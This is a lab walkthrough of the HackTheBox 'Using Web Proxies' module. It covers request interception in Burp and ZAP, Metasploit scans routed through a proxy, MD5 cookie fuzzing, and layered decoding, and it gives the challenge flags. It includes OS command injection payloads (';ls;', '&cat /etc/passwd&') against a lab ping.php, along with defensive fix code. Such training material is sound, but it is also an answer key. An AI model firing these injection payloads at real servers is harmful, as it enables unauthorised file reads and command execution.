Using Web Proxies HackTheBox

Avataris12
5 min read · Aug 27, 2022


Intercepting Web Requests

So, let us change the ip parameter’s value from 1 to ‘;ls;’.

Try intercepting the ping request on the server shown above, and change the post data similarly to what we did in this section. Change the command to read ‘flag.txt’

Try using request repeating to be able to quickly test commands. With that, try looking for the other flag.

The string found in the attached file has been encoded several times with various encoders. Try to use the decoding tools we discussed to decode it and get the flag.

string:

VTJ4U1VrNUZjRlZXVkVKTFZrWkdOVk5zVW10aFZYQlZWRmh3UzFaR2NITlRiRkphWld0d1ZWUllaRXRXUm10M1UyeFNUbVZGY0ZWWGJYaExWa1V3ZVZOc1VsZGlWWEJWVjIxNFMxWkZNVFJUYkZKaFlrVndWVmR0YUV0V1JUQjNVMnhTYTJGM1BUMD0=

BurpSuite -> Decoder

4x Base64 -> ASCII hex -> Binary -> remove ‘%’

HTB{3nc0d1n6_n1nj4}
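The decoding chain above (four rounds of Base64, then ASCII hex, then binary) is the kind of thing you end up doing by hand in Burp Decoder one layer at a time. The script below is an added example, not part of the original write-up or of the HTB module: it peels encoding layers automatically by testing the most restrictive format first (binary, then hex, then Base64) and accepting a layer only when the result is still printable ASCII, so it handles the three encoders in any order and depth. The challenge string itself is not reproduced; `build_constructed_sample` builds a known-answer input with the same layer chain so the output can be checked, and `remove_percent` is the write-up’s final clean-up step.

```python
import base64
import binascii
import string
from typing import Callable, List, Optional, Tuple

PRINTABLE = set(string.printable)


def is_printable(data: bytes) -> bool:
    """Accept criterion for a peeled layer: pure printable ASCII."""
    try:
        return all(ch in PRINTABLE for ch in data.decode("ascii"))
    except UnicodeDecodeError:
        return False


def decode_binary(s: str) -> Optional[bytes]:
    """'01001000 01010100 ...' -> bytes; None if not 8-bit binary."""
    bits = "".join(s.split())
    if not bits or len(bits) % 8 or set(bits) - {"0", "1"}:
        return None
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def decode_hex(s: str) -> Optional[bytes]:
    """'48 54 42' or '485442' -> bytes; None if not hex."""
    compact = "".join(s.split())
    if not compact or len(compact) % 2 or set(compact) - set(string.hexdigits):
        return None
    return bytes.fromhex(compact)


def decode_base64(s: str) -> Optional[bytes]:
    """Standard Base64 with strict alphabet/padding; None if not Base64."""
    compact = "".join(s.split())
    alphabet = set(string.ascii_letters + string.digits + "+/=")
    if not compact or set(compact) - alphabet:
        return None
    try:
        return base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None


# Order matters: every binary string is also valid hex, and every hex string
# is also inside the Base64 alphabet, so the most restrictive format goes first.
LAYERS: List[Tuple[str, Callable[[str], Optional[bytes]]]] = [
    ("binary", decode_binary),
    ("hex", decode_hex),
    ("base64", decode_base64),
]


def peel(encoded: str, max_layers: int = 16) -> Tuple[str, List[str]]:
    """Strip layers until no decoder applies; returns (plaintext, layer trail)."""
    current = encoded.strip()
    trail: List[str] = []
    for _ in range(max_layers):
        for name, fn in LAYERS:
            out = fn(current)
            if out is not None and is_printable(out):
                trail.append(name)
                current = out.decode("ascii").strip()
                break
        else:
            break  # nothing matched: we have reached the innermost text
    return current, trail


def remove_percent(s: str) -> str:
    """The write-up's last step: drop the stray '%' characters."""
    return s.replace("%", "")


def build_constructed_sample(plaintext: str, base64_rounds: int = 4) -> str:
    """Constructed known-answer input: binary -> hex -> Base64 x4 (the chain above)."""
    binary = " ".join(format(b, "08b") for b in plaintext.encode("ascii"))
    layered = binary.encode("ascii").hex()
    for _ in range(base64_rounds):
        layered = base64.b64encode(layered.encode("ascii")).decode("ascii")
    return layered


if __name__ == "__main__":
    sample = build_constructed_sample("HTB{3nc0d1n6_n1nj4}")
    plain, trail = peel(sample)
    print(" -> ".join(trail), "=>", remove_percent(plain))
```

Because a layer is accepted only when its output is printable, a wrong guess (for example treating a hex string as Base64) is discarded instead of poisoning the next round. The trail it returns is the same sequence you would have clicked through in Burp Decoder.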

Proxying Tools

Try running ‘auxiliary/scanner/http/http_put’ in Metasploit on any website, while routing the traffic through Burp. Once you view the requests sent, what is the last line in the request?

msfconsole

msf6 > search http_put

msf6 > use 0

msf6 > set RHOSTS 206.189.117.48

msf6 > set RPORT 30301

msf6 > set PROXIES HTTP:127.0.0.1:8080

msf6 > run

Burp Intruder

Use Burp Intruder to fuzz for ‘.html’ files under the /admin directory, to find a file containing the flag.

ZAP Fuzzer

The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit ‘/skills/’ to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the “top-usernames-shortlist.txt” wordlist from Seclists.

Intercept the website request in ZAP.

Fuzzer request:

Right-click the cookie value in the request -> Fuzz

Set wordlist: top-usernames-shortlist.txt

Set Processors: Hash MD5

Start Fuzz.

cookie=ee11cbb19052e40b07aac0ca060c23ee (md5 of ‘user’)

Try using that hash as the cookie value.
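What the ZAP fuzzer with the MD5 processor does here is a dictionary attack against a cookie that is nothing more than an unsalted hash of the username. The following is an added example, not code from the write-up or from the lab: `recover_username` reproduces the check on the cookie value observed above against a constructed stand-in for SecLists’ top-usernames-shortlist.txt, and the two `signed_cookie` functions show the defensive fix, an HMAC over the username under a server-side secret, so that knowing the hash function and a username list is no longer enough to mint someone else’s cookie. The secret and the short wordlist are constructed for the demo.

```python
import hashlib
import hmac
import secrets
from typing import Iterable, Optional

# Cookie value observed in the lab request for the guest user.
OBSERVED_COOKIE = "ee11cbb19052e40b07aac0ca060c23ee"

# Constructed stand-in for SecLists' top-usernames-shortlist.txt (a few entries).
SHORTLIST = ["root", "admin", "test", "guest", "info", "adm", "mysql",
             "user", "administrator", "oracle"]


def md5_hex(value: str) -> str:
    return hashlib.md5(value.encode("utf-8")).hexdigest()


def recover_username(cookie: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack the fuzzer performs: hash each candidate, compare."""
    target = cookie.strip().lower()
    for name in wordlist:
        if md5_hex(name) == target:
            return name
    return None


# Hardened alternative: a keyed MAC binds the cookie to a secret the client
# never sees, so a username list gives an attacker nothing to replay.
def make_signed_cookie(username: str, secret: bytes) -> str:
    mac = hmac.new(secret, username.encode("utf-8"), hashlib.sha256).hexdigest()
    return f"{username}:{mac}"


def verify_signed_cookie(cookie: str, secret: bytes) -> Optional[str]:
    """Returns the username if the MAC checks out, otherwise None."""
    username, _, mac = cookie.rpartition(":")
    if not username:
        return None
    expected = hmac.new(secret, username.encode("utf-8"), hashlib.sha256).hexdigest()
    return username if hmac.compare_digest(mac, expected) else None


if __name__ == "__main__":
    print("weak cookie belongs to:", recover_username(OBSERVED_COOKIE, SHORTLIST))
    secret = secrets.token_bytes(32)  # constructed demo secret
    cookie = make_signed_cookie("admin", secret)
    print("signed cookie verifies as:", verify_signed_cookie(cookie, secret))
    print("forged md5 cookie verifies as:",
          verify_signed_cookie("admin:" + md5_hex("admin"), secret))
```

The signed form still exposes the username in clear and is only as good as the secret’s handling; the usual production answer is an opaque random session identifier looked up server-side, but the HMAC variant is the smallest change that defeats the fuzzing shown in this section.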

ZAP Scanner

Run ZAP Scanner on the target above to identify directories and potential vulnerabilities. Once you find the high-level vulnerability, try to use it to read the flag at ‘/flag.txt’

Remote OS Command Injection

http://139.59.191.154:32538/devtools/ping.php?ip=127.0.0.1%26cat+%2Fetc%2Fpasswd%26

http://139.59.191.154:32538/devtools/ping.php?ip=127.0.0.1%26cat+%2Fflag.txt%26
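The finding ZAP reports here, and the `;ls;` payload from the first section, both come from the same defect: the ip parameter is pasted into a shell command string. The example below is added for this write-up and is not the lab’s source code (the real ping.php is not shown on the page); it puts the vulnerable pattern next to the hardened one in Python. `vulnerable_ping_command` only builds the shell string, it does not run it, so the injected part can be inspected; `validated_ping_argv` accepts nothing but a parseable IP address and hands it to `subprocess` as a separate argv element with no shell involved, which is the fix that makes `&`, `;` and friends inert.

```python
import ipaddress
import subprocess
from typing import List

# Payload from this section, URL-decoded (%26 -> '&', '+' -> ' ').
INJECTED = "127.0.0.1&cat /flag.txt&"


def vulnerable_ping_command(ip: str) -> str:
    """The pattern behind the ZAP finding: user input interpolated into a shell
    string. With shell=True (or PHP's shell_exec), '&' and ';' end the ping
    command and start a new one. Returned, not executed, for inspection."""
    return f"ping -c 1 {ip}"


def validated_ping_argv(ip: str) -> List[str]:
    """Hardened version: allow-list the value as an IP address and keep it as
    its own argv element so the shell never parses it."""
    try:
        addr = ipaddress.ip_address(ip.strip())
    except ValueError as exc:
        raise ValueError(f"rejected ip parameter: {ip!r}") from exc
    return ["ping", "-c", "1", str(addr)]


def is_accepted(ip: str) -> bool:
    """Convenience check: would the hardened handler run a ping for this value?"""
    try:
        validated_ping_argv(ip)
        return True
    except ValueError:
        return False


def run_ping(ip: str) -> int:
    """Executes the hardened command. shell=False is the default for a list
    argv, so the validated address cannot be reinterpreted as shell syntax."""
    proc = subprocess.run(validated_ping_argv(ip), capture_output=True, timeout=10)
    return proc.returncode


if __name__ == "__main__":
    print("vulnerable shell line :", vulnerable_ping_command(INJECTED))
    for value in ["127.0.0.1", "::1", INJECTED, ";ls;"]:
        print(f"{value!r:32} accepted={is_accepted(value)}")
```

If the feature genuinely has to accept hostnames as well, the same structure still applies: validate against a strict hostname grammar and keep the list-form `subprocess` call; the point is that the allow-list plus no-shell combination removes the injection class rather than trying to blacklist metacharacters.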

Skills Assessment — Using Web Proxies

The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.

Note: intercept the request for the /lucky.php page, remove the ‘disabled’ attribute from the button in the response, then click the button; intercept the button’s request, send it to Repeater and resend it several times until the flag is returned.

The /admin.php page uses a cookie that has been encoded multiple times. Try to decode the cookie until you get a value with 31-characters. Submit the value as the answer.

CyberChef -> From Hex -> From Base64

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the “alphanum-case.txt” wordlist from Seclist for the payload)

Burp: run the Intruder attack with that payload and get the flag.

You are using the ‘auxiliary/scanner/http/coldfusion_locale_traversal’ tool within Metasploit, but it is not working properly for you. You decide to capture the request sent by Metasploit so you can manually verify it and repeat it. Once you capture the request, what is the ‘XXXXX’ directory being called in ‘/XXXXX/administrator/..’?

msf6 > search coldfusion_locale_traversal

msf6 > use 0

msf6 > set RHOSTS 167.71.140.137

msf6 > set RPORT 30650

msf6 > set PROXIES HTTP:127.0.0.1:8080

msf6 > exploit
